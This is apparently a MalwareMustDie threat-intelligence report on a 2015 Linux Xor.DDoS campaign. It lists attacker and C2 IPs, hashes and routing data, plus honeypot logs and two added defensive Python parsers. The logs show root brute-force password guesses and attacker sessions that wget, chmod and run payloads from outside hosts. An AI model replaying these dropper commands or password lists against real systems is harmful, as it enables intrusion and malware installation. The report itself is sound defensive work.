MalwareMustDie

Xor.DDoS HOSTASA.ORG Updates

Sep 14th, 2015
// ------------------------
// Background:
// ------------------------

XOR.DDOS attack recorded from June 22nd 2015 to Sept 15 2015
By #MalwareMustDie - @unixfreaxjp

Additional/updates to the XOR.DDOS case reported:
MMD-0033-2015 Linux/XorDDoS infection incident report (CNC: HOSTASA.ORG)
http://blog.malwaremustdie.org/2015/06/mmd-0033-2015-linuxxorddos-infection_23.html
MalwareMustDie references on XOR.DDoS:
http://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html
http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html

POINT: Hong Kong and United States CNC are still actively being used.

// ------------------------
// Cumulative attacker IPs:
// ------------------------

43.229.52.79
43.229.53.28
43.229.53.49
43.229.53.63
43.229.53.88
43.255.188.139
43.255.189.16

// ------------------------
// Sample brute login used:
// ------------------------

2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
2015-06-22 19:42:35+0900 [ip=43.229.52.79] login attempt [root/audenzio1]
2015-06-22 19:42:38+0900 [ip=43.229.52.79] login attempt [root/DROWSS@P1]
2015-06-22 19:42:39+0900 [ip=43.229.52.79] login attempt [root/bcampbell]
2015-06-22 19:42:40+0900 [ip=43.229.52.79] login attempt [root/cmarshall]
2015-06-22 19:42:43+0900 [ip=43.229.52.79] login attempt [root/dragostea]
2015-06-22 19:42:44+0900 [ip=43.229.52.79] login attempt [root/rx.123456]
2015-06-22 19:42:45+0900 [ip=43.229.52.79] login attempt [root/soigan123]
2015-06-22 19:42:48+0900 [ip=43.229.52.79] login attempt [root/adajacobs]
2015-06-22 19:42:50+0900 [ip=43.229.52.79] login attempt [root/ta.123456]
2015-06-22 19:42:51+0900 [ip=43.229.52.79] login attempt [root/aquilino1]
2015-06-22 19:42:54+0900 [ip=43.229.52.79] login attempt [root/root22222]
2015-06-22 19:42:55+0900 [ip=43.229.52.79] login attempt [root/0isPLIqsm]
2015-06-22 19:42:56+0900 [ip=43.229.52.79] login attempt [root/jmcmurray]
2015-06-22 19:42:59+0900 [ip=43.229.52.79] login attempt [root/yr.123456]
2015-06-22 19:43:00+0900 [ip=43.229.52.79] login attempt [root/vikiyulia]
2015-06-22 19:43:01+0900 [ip=43.229.52.79] login attempt [root/doriana12]
2015-06-22 19:43:04+0900 [ip=43.229.52.79] login attempt [root/casper11]
2015-06-22 19:43:06+0900 [ip=43.229.52.79] login attempt [root/yb.123456]
2015-06-22 19:43:07+0900 [ip=43.229.52.79] login attempt [root/wangyi123]
2015-06-22 19:43:10+0900 [ip=43.229.52.79] login attempt [root/uj.123456]
2015-06-22 19:43:11+0900 [ip=43.229.52.79] login attempt [root/aavishkar]
2015-06-22 19:43:12+0900 [ip=43.229.52.79] login attempt [root/046194575]
2015-06-22 19:43:15+0900 [ip=43.229.52.79] login attempt [root/marquardt]
2015-06-22 19:43:16+0900 [ip=43.229.52.79] login attempt [root/pavila123]
2015-06-22 19:43:17+0900 [ip=43.229.52.79] login attempt [root/io.123456]
2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
2015-06-22 19:43:22+0900 [ip=43.229.52.79] login attempt [root/victoriar]
2015-06-22 19:43:23+0900 [ip=43.229.52.79] login attempt [root/in.123456]
(...)
2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:58:45+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 15:54:43+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-10 13:29:00+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-10 14:18:02+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 10:58:51+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 11:41:14+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 12:18:56+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-14 13:58:40+0900 [ip=43.229.53.49] login attempt [root/!@]

// ------------------------
// Payload attacker & payload IP:
// ------------------------

43.229.53.90

// ------------------------
// Payload downloaded by attackers log:
// ------------------------

2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12

2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121

2015-08-31 16:29:46+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-31 16:29:46+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-31 16:29:46+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] chmod +x i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] ./i324

2015-09-10 13:33:49+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-10 13:33:49+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-10 13:33:49+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] chmod +x g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] ./g13e

2015-09-14 14:02:02+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-14 14:02:02+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-14 14:02:02+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] chmod +x f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] ./f1c3

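The two honeypot log shapes above (per-attempt "login attempt [user/password]" lines, and "exec command" sessions whose wget line carries the de-fanged h00p:// payload URL) are easy to turn into detection logic. The following is an added Python example, not code from the MalwareMustDie paste: it parses a constructed sample in that exact format, flags source IPs whose attempt rate looks like brute forcing, and extracts the hosts the droppers fetch from. The sample lines, the 3-attempts-in-60-seconds threshold and the function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the honeypot's own log format (lines shortened from the paste).
SAMPLE_LOG = """\
2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
"""

LINE_RE = re.compile(r"^(\S+ \S+) \[ip=([\d.]+)\] (.*)$")
LOGIN_RE = re.compile(r"^login attempt \[([^/\]]*)/(.*)\]$")
URL_RE = re.compile(r"\b(?:h00p|hxxp|http)s?://([^/\s]+)(\S*)")  # de-fanged schemes too

def parse(log_text):
    """logins[ip] -> [(timestamp, user, password)], downloads[ip] -> [(host, path)]."""
    logins, downloads = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a honeypot event line
        ts, ip, rest = m.groups()
        lm = LOGIN_RE.match(rest)
        if lm:
            logins[ip].append((ts, lm.group(1), lm.group(2)))
            continue
        um = URL_RE.search(rest)
        if um and rest.startswith(("wget ", "curl ")):   # dropper fetch inside a shell session
            downloads[ip].append((um.group(1), um.group(2)))
    return logins, downloads

def brute_force_ips(logins, threshold=3, window=60):
    """IPs with at least `threshold` login attempts inside any `window`-second span."""
    flagged = {}
    for ip, attempts in logins.items():
        times = sorted(datetime.strptime(t, "%Y-%m-%d %H:%M:%S%z") for t, _, _ in attempts)
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window:
                flagged[ip] = len(attempts)
                break
    return flagged

def payload_hosts(downloads):
    """Distinct hosts the droppers pulled payloads from (block-list candidates)."""
    return sorted({host for hits in downloads.values() for host, _ in hits})
```

Running `parse(SAMPLE_LOG)` and feeding the results to the two helpers yields the brute-forcing IP with its attempt count and the payload host 43.229.53.88; the slow single-password sweep from 43.229.53.28 stays below the default threshold, which is the point of the window parameter.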
// ------------------------
// Sample hashes (uploaded to VT):
// ------------------------

142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681

// ------------------------
// CNC domains, IP, DNS:
// ------------------------

aa.hostasa.org  23.234.60.143  // http downloads h00p://aa.hostasa.org/leg.rar (Xor-ed ELF trojan/downloader malware, prev known as "g.rar")
ns1.hostasa.org 107.160.40.9      // cnc
ns2.hostasa.org 103.240.140.152   // cnc
ns3.hostasa.org 103.240.141.54    // cnc
ns4.hostasa.org 192.126.126.64    // cnc

;; AUTHORITY SECTION:
hostasa.org.            3600    IN      NS      ns1cnb.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns4lny.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns3cna.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns2dky.domain-resolution.net.

// ------------------------
// Infector & CNC IP routes:
// ------------------------

43.229.52.79||63857 | 43.229.52.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.28||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.49||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.63||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.88||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.255.188.139||36351 | 43.255.188.0/24 | SOFTLAYER | US | - | Sex Insex
43.255.189.16|| |  |  | HK | 0451dns.com | Shimizu Hang Road Causeway Bay Hong Kong International

23.234.60.143||26484 | 23.234.60.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
107.160.40.9||40676 | 107.160.0.0/16 | AS40676 | US | psychz.net | Psychz Networks
103.240.140.152||62466 | 103.240.140.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
103.240.141.54||62466 | 103.240.141.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
192.126.126.64||26484 | 192.126.126.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC

// ------------------------
// Infector & CNC GeoIP
// ------------------------

43.229.52.79, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.28, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.49, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.63, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.88, , ,   Hong Kong, 22.25, 114.1667, AS
43.255.188.139, , , Hong Kong, 22.25, 114.1667, AS
43.255.189.16, , ,  Hong Kong, 22.25, 114.1667, AS

23.234.60.143, Newark, 19711, United States, 39.7151, -75.7306
107.160.40.9, Walnut, 91789, United States, 34.0115, -117.8535
103.240.140.152, Central District, , Hong Kong, 22.2833, 114.15
103.240.141.54, Central District, , Hong Kong, 22.2833, 114.15, AS
192.126.126.64, Los Angeles, 90017, United States, 34.053, -118.2642

// ------------------------
// Just some recent PoCs:
// ------------------------

TCP MMD-JP.ORG:49214->192.126.126.64:3307 (ESTABLISHED)
TCP MMD-JP.ORG:44325->107.160.40.9:3307 (ESTABLISHED)
TCP MMD-JP.ORG:58487->23.234.60.143:http (ESTABLISHED)

2015-09-15 06:55:12.954090 IP MMD-JP.ORG.58476 > 23.234.60.143
http: Flags [P.], seq 1:215, ack 1, win 884, options [nop,nop,TS val 34190894 ecr 2820891477], length 214
E..6.@.@....nJ...<..l.Ps...J......tk.........#cU

GET /leg.rar HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: aa.hostasa.org
Connection: Keep-Alive
[...]

2015-09-15 06:55:13.121609 IP 23.234.60.143.http > MMD-JP.ORG.58476:
Flags [.], seq 1:1403, ack 215, win 54, options [nop,nop,TS val 2820891645 ecr 34190894], length 1402
E....h@.4.)#..<..nJ..P.lJ...s..i...6........#c..   ..

HTTP/1.1 200 OK
Date: Tue, 15 Sep 2015 05:54:14 GMT
Server: Apache
Last-Modified: Sun, 07 Dec 2014 08:27:46 GMT
ETag: "2475-5099c15a16480"
Accept-Ranges: bytes
Content-Length: 9333
Keep-Alive: timeout=5, max=2048
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

/&.{L9R$/8PE    .h.pl.~u..qqm....h.{r..v..qop....t.ls.jp..sqv....w.wn.vq..sos
[...]
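The capture above shows the CNC web server labelling leg.rar as application/x-rar-compressed, while the CNC section identifies the file as a XOR-ed ELF. A defender triaging such a download should trust magic bytes over the declared type. The following is an added Python example (not code from the paste): it splits a captured HTTP response, compares the Content-Type header with what the body's first bytes actually are, and, assuming a single-byte XOR (the paste does not say which key or key length the sample uses), tries to recover a key that turns the first four bytes into an ELF header. The response bytes and the key 0x5a are constructed for the demonstration.

```python
RAR_MAGICS = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")  # RAR4 / RAR5 signatures
ELF_MAGIC = b"\x7fELF"

# Constructed response modelled on the capture's headers. The body is a fake 64-byte
# ELF header XOR-ed with one constructed key byte (0x5a); the real key is not on the page.
FAKE_ELF = ELF_MAGIC + b"\x02\x01\x01" + bytes(9) + b"\x02\x00\x3e\x00\x01\x00\x00\x00" + bytes(40)
KEY = 0x5a
BODY = bytes(b ^ KEY for b in FAKE_ELF)
RAW_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
                b"Content-Type: application/x-rar-compressed\r\n"
                b"Content-Length: %d\r\n\r\n" % len(BODY) + BODY)

def split_response(raw):
    """Split a raw HTTP/1.x response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, body

def sniff(body):
    """Identify the body by magic bytes rather than by what the server claims."""
    if body.startswith(RAR_MAGICS):
        return "rar"
    if body.startswith(ELF_MAGIC):
        return "elf"
    return "unknown"

def find_single_byte_xor_key(body):
    """Return the key byte k for which body[:4] ^ k is an ELF header, or None."""
    for k in range(256):
        if bytes(b ^ k for b in body[:4]) == ELF_MAGIC:
            return k
    return None

def check_download(raw):
    """Flag a response whose declared type disagrees with its content."""
    _, headers, body = split_response(raw)
    declared = headers.get("content-type", "")
    sniffed = sniff(body)
    claims_rar = declared == "application/x-rar-compressed"
    return {
        "declared": declared,
        "sniffed": sniffed,
        "mismatch": claims_rar and sniffed != "rar",
        "xor_key": find_single_byte_xor_key(body) if sniffed == "unknown" else None,
    }
```

A real RAR body passes the check unchanged; a body that claims RAR but matches neither signature is reported as a mismatch, and a recovered key is a strong hint that the download is a XOR-wrapped ELF worth pulling into a sandbox.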

#MalwareMustDie!
[EOF]